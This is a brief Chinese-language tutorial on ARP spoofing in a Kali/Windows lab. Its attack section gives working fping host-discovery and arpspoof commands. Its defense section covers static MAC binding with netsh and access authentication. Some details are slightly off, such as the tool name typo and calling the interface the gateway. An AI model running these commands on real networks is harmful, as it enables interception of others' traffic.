---
ARP欺骗

---

> **准备**
>
> 1. 一台Kali
> 2. 一台Windows

需要用到`arpsproof` , 输入 `sudo apt-get install dsniff`就可以安装了

# 攻击部分

> 1. **确定ip**
>
> 可以用 `fping -g  想要扫描的ip  >> ip.txt` 
>
> 之后通过 `cat ip.txt | grep alive` 来查看哪些ip存活



> 开始arp攻击
>
> ```
> arpspoof -i eth0(网关) -t 目标ip -r 本地ip
> ```



# 防御部分

**几个方法如下:**

1. 通过 `arp -a` 来查看 网关的ip 对应的 MAC地址,  以此来判断是否受到arp攻击

2. 强制绑定真实的MAC地址 . 在windows中查看存在的网关, 输入:

   ```
   netsh i i show in
   ```

   接着强制绑定真实的MAC地址

   ````
   netsh  -c "i i" add neighbors Ethernet0 网关ip 网关真实的MAC地址
   ````

3. 还可以直接用第三方软件, 例如: `360`等, 开启 `流量防火墙` 就可以自动绑定

4. 网络介入认证, 拒绝非实名认证的设备